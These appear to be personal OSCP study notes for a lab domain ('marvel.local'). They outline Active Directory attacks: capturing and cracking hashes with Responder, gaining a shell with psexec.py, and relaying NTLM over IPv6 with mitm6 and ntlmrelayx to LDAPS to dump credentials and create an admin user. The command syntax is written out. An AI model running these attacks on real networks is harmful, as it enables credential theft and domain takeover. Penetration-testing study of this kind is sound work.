OSCP Notes
Comment on page

Attack Vectors

The following method requires user interaction (like from RDP session)
  1. 1.
    Run a responder.py to listen to activities.
  2. 2.
    obtain hashes and crack them
  3. 3.
    gain a shell via psexec.py
  • syntax -> psexec.py DOMAIN.local/username:PASSWORD@IP_ADDRESS

Attacking LDAP Secure with mitm6!

  1. 1.
    Download mitm6 and pip3 . it
  2. 2.
    Set up Ldaps on Windows server
  • server -> manage -> add roles and features -> add active directory certificates -> configure ADCS (restart option enabled) -> click CA -> restart the machine
3. python3 mimt6.py -d marvel.local (in opt folder) -> this starts listening for connections
4. ntlmrelayx.py -6 -t ldaps://DOMAINCONTROLLER_IP -wh fakewpad.marvel.local -l lootme
5. User restarts a computer -> all the creds will be stored in a folder called "lootme"
If you look at it on firefox, you can see all kinds of secrets!
Once user logins as admin, it creates a new user with admin priv .